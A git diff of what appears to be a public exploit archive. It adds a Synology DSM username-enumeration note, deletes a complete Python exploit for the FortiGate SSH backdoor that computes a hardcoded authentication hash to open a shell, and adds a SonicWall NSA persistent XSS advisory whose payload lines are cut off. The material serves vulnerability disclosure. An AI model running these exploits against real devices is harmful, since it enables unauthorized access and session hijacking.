diff --git a/exploits/cgi/webapps/43455.txt b/exploits/cgi/webapps/43455.txt new file mode 100644 index 000000000..f5a88af05 --- /dev/null +++ b/exploits/cgi/webapps/43455.txt @@ -0,0 +1,21 @@ +# Exploit Title: Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration +# Date: 01/05/2018 +# Exploit Author: Steve Kaun +# Vendor Homepage: https://www.synology.com +# Version: Before 6.1.3-15152 +# CVE : CVE-2017-9554 + +Previously this was identified by the developer and the disclosure states "via unspecified vectors" it is possible to enumerate usernames via forget_passwd.cgi + +Haven't identified any other disclosures that actually identified the attack vector, figure it would be helpful to another. + + +"An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames via unspecified vectors." + +Well then... Here you go, cracked the code and figured it out. + +https://IP_Address:5001/webman/forget_passwd.cgi?user=XXX + +Where XXX should be your injection point for username lists. + +Several usernames I've found are admin, administrator, root, nobody, ftp, and more. I'm unsure of whether Synology is pulling these entries from it's passwd file or not, but there you go. \ No newline at end of file diff --git a/exploits/hardware/remote/39224.py b/exploits/hardware/remote/39224.py deleted file mode 100755 index e56d9d0d0..000000000 --- a/exploits/hardware/remote/39224.py +++ /dev/null @@ -1,77 +0,0 @@ -#!/usr/bin/env python - -# SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 -# Usage: ./fgt_ssh_backdoor.py - -import socket -import select -import sys -import paramiko -from paramiko.py3compat import u -import base64 -import hashlib -import termios -import tty - -def custom_handler(title, instructions, prompt_list): - n = prompt_list[0][0] - m = hashlib.sha1() - m.update('\x00' * 12) - m.update(n + 'FGTAbc11*xy+Qqz27') - m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70') - h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest()) - return [h] - - -def main(): - if len(sys.argv) < 2: - print 'Usage: ' + sys.argv[0] + ' ' - exit(-1) - - client = paramiko.SSHClient() - client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) - - try: - client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False) - except paramiko.ssh_exception.SSHException: - pass - - trans = client.get_transport() - try: - trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True) - except paramiko.ssh_exception.AuthenticationException: - pass - - trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler) - chan = client.invoke_shell() - - oldtty = termios.tcgetattr(sys.stdin) - try: - tty.setraw(sys.stdin.fileno()) - tty.setcbreak(sys.stdin.fileno()) - chan.settimeout(0.0) - - while True: - r, w, e = select.select([chan, sys.stdin], [], []) - if chan in r: - try: - x = u(chan.recv(1024)) - if len(x) == 0: - sys.stdout.write('\r\n*** EOF\r\n') - break - sys.stdout.write(x) - sys.stdout.flush() - except socket.timeout: - pass - if sys.stdin in r: - x = sys.stdin.read(1) - if len(x) == 0: - break - chan.send(x) - - finally: - termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty) - - -if __name__ == '__main__': - main() \ No newline at end of file diff --git a/exploits/hardware/webapps/43459.txt b/exploits/hardware/webapps/43459.txt new file mode 100644 index 000000000..409a9f1ea --- /dev/null +++ b/exploits/hardware/webapps/43459.txt @@ -0,0 +1,441 @@ +Document Title: +=============== +SonicWall SonicOS NSA Web Firewall - Multiple Web Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1725 + + +Release Date: +============= +2018-01-06 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1725 + + +Common Vulnerability Scoring System: +==================================== +4.5 + + +Vulnerability Class: +==================== +Multiple + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Achieve a deeper level of security with the SonicWALL Network Security Appliance (NSA) Series of next-generation firewalls. NSA Series appliances +integrate automated and dynamic security capabilities into a single platform, combining the patented1, SonicWALL Reassembly Free Deep Packet +Inspection (RFDPI) firewall engine with a powerful, massively scalable, multi-core architecture. Now you can block even the most sophisticated +threats with an intrusion prevention system (IPS) featuring advanced anti-evasion capabilities, SSL decryption and inspection, and network-based +malware protection that leverages the power of the cloud. + +(Copy of the Homepage: http://www.sonicwall.com/products/sonicwall-nsa/ ) + + +The proven SonicOS architecture is at the core of every Dell SonicWALL firewall from the SuperMassive™ E10800 to the TZ 100. SonicOS uses deep packet +inspection technology in combination with multi-core specialized security microprocessors to deliver application intelligence, control, and real-time +visualization, intrusion prevention, high-speed virtual private networking (VPN) technology and other robust security features. + +(Copy of the Homepage: http://www.sonicwall.com/network-security-os-platform/ ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research Team discovered multiple persistent validation vulnerabilities and a filter bypass issue in +the official DELL SonicWall SonicOS NSA Series web-application firewall (utm) appliances. + + +Vulnerability Disclosure Timeline: +================================== +2018-01-06: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +DELL +Product: SonicWall UTM Firewall (NSA;MX,CLI;TZ) Series 2016 Q4 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Technical Details & Description: +================================ +Multiple persistent input validation web vulnerabilities and a filter bypass issue has been discovered in the official SonicWall SoniOS NSA UTM Web-Firewall Series. +The issue allows remote attackers and privileged user accounts to inject own malicious script codes with persistent attack vector to the affected modules to +compromise the web-application or user session data. + +The peristent exploitable validation vulnerabilities are located in the `Host Name / IP Address`, `Client Name/IP Address` and `Proxy Forward To` input fields of +the `Users - Settings - Configure SSO` web appliance module. Remote attackers and low privileged application user accounts are able to inject own malicious script +codes to the vulnerable input fields to compromise the `Users - Settings - Configure SSO` settings module item listing. At the end an attacker is able to save the +information as executable content within the backend. After that the malicious context is saved to the SSO configuration module which executes the context. +The input fields are not parsed, the context does not encode the input with a secure mechanism. The injection points are the marked input fields with the request +method of the vulnerable modules. The execution points are located in the item listing of the separate sections. + +A filter restriction is implemented and is trying to secure the validation. The filter mechanism parses iframes with src source and other script code tags. In case +of a mouseover onload link to a source or an img src onload with cookie alert the tags can bypass the filter validation procedure somehow and an execution of the +context occurs. + +The security risk of the peristent web vulnerabilities and filter bypass issue are estimated as medium with a cvss (common vulnerability scoring system) count of 4.5. +Exploitation of the persistent web vulnerabilities and filter bypass issue requires a low privileged web application user account and low or medium user interaction. +Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects, persistent load of malicious script +codes or persistent web module context manipulation. + +Affected Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Users - Settings - Configure SSO - SSO Agents +[+] Users - Settings - Configure SSO - Terminal Services Agent Settings +[+] Users - Settings - Configure SSO - RADIUS Accounting Single-Sign-On + +Vulnerable Input(s): +[+] Host Name / IP Address +[+] Client Name/IP Address +[+] Proxy Forward To + +Vulnerable Parameter(s): +[+] ldapServerBindName +[+] usrTreesSel +[+] ldapUsrsTree_1 +[+] svcObjId + + +Affected Serie(s): +[+] SonicWALL NSA 6600 +[+] SonicWALL NSA 5600 +[+] SonicWALL NSA 4600 +[+] SonicWALL NSA 3600 +[+] SonicWALL NSA 2600 +[+] SonicWALL NSA 250M + +Affected System(s): +[+] SonicOS (Standard or Enhanced) + + +Proof of Concept (PoC): +======================= +The web vulnerabilities can be exploited by remote attackers with low privileged or restricted appliance application user account with low or +medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Open the appliance web-application firewall of sonicwall and login as restricted user or lower privileged user account +2. Surf to the Users module +3. Click to Settings and open the "SSO Configure" button +4. Open one of the vulnerable modules +Note: Users > Settings > Configure SSO > SSO Agents; > Terminal Services Agent Settings or > RADIUS Accounting Single-Sign-On +5. Inject a script code payload to the Host Name/IP Address(es), Client Name/IP Address & Proxy Forward To input fields +Note: Regular frames are filtered but img or iframes with alert onload or onmouseover tag do bypass the filter validation +6. Save the entry and the payload directly executes in the utm firewall web user interface +7. Successful reproduce of the application-side input validation vulnerability and filter bypass issue! + + +PoC Payload(s): +">XSS ONMOUSEOVER TEST +"> +"><"%20%20>"